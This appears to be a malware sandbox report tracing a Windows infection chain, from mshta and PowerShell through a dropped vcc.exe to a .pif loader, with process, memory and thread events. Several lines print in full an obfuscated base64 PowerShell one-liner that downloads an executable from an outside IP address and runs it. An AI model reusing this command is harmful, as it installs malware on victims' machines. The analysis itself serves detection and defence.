Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe"
Source: C:\Users\user\AppData\Roaming\vcc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\8161.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\vcc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\29106.cmd""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\vcc.exe	Process created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pif
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\vcc.exe "C:\Users\user\AppData\Roaming\vcc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2571.tmp" "c:\Users\user\AppData\Local\Temp\gbdknv1n\CSCC8613962BFBB4D698240FB82ECB0F974.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\8161.cmd""	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\29106.cmd""	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vcc.exe	Process created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pif	Jump to behavior

Source: Yara match	File source: 6.2.vcc.exe.21d9548.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vcc.exe.2880000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vcc.exe.21d9548.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1466196833.00000000021D9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])
Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, _.cs	.Net Code: ___ System.Reflection.Assembly.Load(byte[])

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_075F24A1 push esp; iretd	3_2_075F2515
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028A62A4 push 028A630Fh; ret	6_2_028A6307
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02883210 push eax; ret	6_2_0288324C
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028A60AC push 028A6125h; ret	6_2_028A611D
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0289A018 push ecx; mov dword ptr [esp], edx	6_2_0289A01D
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0289606B push 028960A4h; ret	6_2_0289609C
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0289606C push 028960A4h; ret	6_2_0289609C
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288C1C6 push 0288C61Eh; ret	6_2_0288C616
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028A61F8 push 028A6288h; ret	6_2_028A6280
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028A6144 push 028A61ECh; ret	6_2_028A61E4
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288617A push 028861BEh; ret	6_2_028861B6
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288617C push 028861BEh; ret	6_2_028861B6
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288F600 push 0288F64Dh; ret	6_2_0288F645
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288C498 push 0288C61Eh; ret	6_2_0288C616
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288F4F4 push 0288F56Ah; ret	6_2_0288F562
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02892410 push ecx; mov dword ptr [esp], edx	6_2_02892412
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288F5FF push 0288F64Dh; ret	6_2_0288F645
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_028A5854 push 028A5A3Ah; ret	6_2_028A5A32
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02892EDA push 02892F87h; ret	6_2_02892F7F
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02892EDC push 02892F87h; ret	6_2_02892F7F
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288BE18 push ecx; mov dword ptr [esp], edx	6_2_0288BE1D
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02893F84 push 02893FBCh; ret	6_2_02893FB4
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02899FB4 push ecx; mov dword ptr [esp], edx	6_2_02899FB9
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02885D9E push 02885DFBh; ret	6_2_02885DF3
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02885DA0 push 02885DFBh; ret	6_2_02885DF3
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_0288CDE0 push 0288CE0Ch; ret	6_2_0288CE04
Source: C:\Users\user\AppData\Roaming\vcc.exe	Code function: 6_2_02893D40 push 02893D82h; ret	6_2_02893D7A
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_0041C40C push cs; iretd	11_2_0041C4E2
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_00423149 push eax; ret	11_2_00423179
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_0041C50E push cs; iretd	11_2_0041C4E2
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 11_2_004231C8 push eax; ret	11_2_00423179

Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Links\daphpvwO.pif	Memory allocated: 28F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Memory allocated: 293B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Memory allocated: 29160000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597956	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597718	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597433	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 597039	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596880	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596421	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594967	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594858	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594482	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594364	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 594080	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Thread delayed: delay time: 593837	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Window / User API: threadDelayed 9987	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7723	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1926	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Window / User API: threadDelayed 7584	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Window / User API: threadDelayed 2248	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif	Window / User API: foregroundWindowGot 1772	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe TID: 6972	Thread sleep count: 9987 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1488	Thread sleep count: 7723 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076	Thread sleep count: 1926 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5244	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -35971150943733603s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 3676	Thread sleep count: 7584 > 30	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 3676	Thread sleep count: 2248 > 30	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Links\daphpvwO.pif TID: 4296	Thread sleep time: -599438s >= -30000s	Jump to behavior
